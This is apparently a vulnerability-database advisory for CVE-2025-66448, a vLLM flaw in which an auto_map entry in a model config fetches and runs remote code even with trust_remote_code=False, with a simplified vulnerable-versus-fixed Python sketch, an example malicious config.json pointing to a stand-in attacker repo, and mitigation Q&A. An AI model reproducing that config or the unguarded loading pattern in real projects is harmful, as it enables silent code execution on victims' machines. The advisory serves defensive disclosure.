CVE-2025-66448
BaseFortify

Publication date: 2025-12-01

Last updated on: 2025-12-03

Assigner: GitHub, Inc.

Description
vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vLLM has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vLLM loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python code from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend silently runs the backend's code on the victim host. This vulnerability is fixed in 0.11.1.
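To make the flaw concrete, the following is a minimal, simplified sketch of the vulnerable pattern described above. It is not vLLM's actual source; the function names and the stubbed get_class_from_dynamic_module are illustrative stand-ins for the real transformers dynamic-module loader, which downloads and executes Python from the Hub repo named in the auto_map string.

```python
# Illustrative sketch (simplified; NOT vLLM's actual code) of why
# trust_remote_code=False did not help: the flag is never consulted
# on the vulnerable path before the dynamic import happens.

def get_class_from_dynamic_module(class_ref):
    # Stand-in for the real transformers loader, which fetches and
    # exec()s Python from the repo named in class_ref.
    raise RuntimeError(f"would fetch and execute code from {class_ref!r}")

def resolve_config_vulnerable(config_dict, trust_remote_code=False):
    """Vulnerable pattern: the auto_map entry is resolved unconditionally."""
    class_ref = config_dict.get("auto_map", {}).get("AutoConfig")
    if class_ref is None:
        return None
    # BUG: trust_remote_code is ignored here, so remote code runs anyway.
    return get_class_from_dynamic_module(class_ref)

def resolve_config_fixed(config_dict, trust_remote_code=False):
    """Fixed pattern: the dynamic import is gated on the flag."""
    class_ref = config_dict.get("auto_map", {}).get("AutoConfig")
    if class_ref is None or not trust_remote_code:
        return None  # refuse dynamic code unless the caller opted in
    return get_class_from_dynamic_module(class_ref)

cfg = {"auto_map": {"AutoConfig": "attacker/backend--configuration.EvilConfig"}}
try:
    resolve_config_vulnerable(cfg, trust_remote_code=False)
except RuntimeError as e:
    print("vulnerable path:", e)  # remote fetch attempted despite the flag
print("fixed path:", resolve_config_fixed(cfg, trust_remote_code=False))
```

The fix amounts to checking trust_remote_code before, not after, the dynamic-module resolution, so an auto_map entry in an untrusted config can no longer trigger a remote fetch on its own.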
Meta Information
Published: 2025-12-01
Last Modified: 2025-12-03
Generated: 2026-05-07
AI Q&A: 2025-12-02
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Showing 2 associated CPEs

Vendor | Product | Version / Range
vllm   | vllm    | 0.11.1
vllm   | vllm    | up to 0.11.1 (inclusive)
CWE-94: The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability in vLLM (prior to version 0.11.1) involves a critical remote code execution issue in the Nemotron_Nano_VL_Config class. When vLLM loads a model configuration containing an auto_map entry, it dynamically fetches and executes Python code from a remote repository specified in that entry. This happens even if the user sets trust_remote_code to False, allowing an attacker to trick the system into running malicious code by publishing a frontend repository whose config points to a malicious backend repository. This leads to silent execution of attacker-controlled code on the victim's machine.
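For illustration, the attacker's benign-looking frontend repo would carry a config.json whose auto_map entry uses the cross-repo "repo_id--module.ClassName" form to point at a separate repo. The repo and class names below are hypothetical:

```json
{
  "model_type": "Nemotron_Nano_VL",
  "auto_map": {
    "AutoConfig": "attacker/malicious-backend--configuration.EvilConfig"
  }
}
```

When an affected vLLM resolves this entry, it fetches and executes the referenced module from the backend repo, regardless of the trust_remote_code setting.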


How can this vulnerability impact me?

This vulnerability can allow an attacker to execute arbitrary code remotely on your system with limited privileges. This can lead to compromise of confidentiality, integrity, and availability of your system and data, including potential data theft, system manipulation, or denial of service.


What immediate steps should I take to mitigate this vulnerability?

Upgrade vLLM to version 0.11.1 or later, as this version contains the fix for the critical remote code execution vulnerability. Until you can upgrade, do not load model configs from untrusted sources at all, and treat any config containing an auto_map entry with suspicion; note that setting trust_remote_code=False does not prevent exploitation in affected versions.

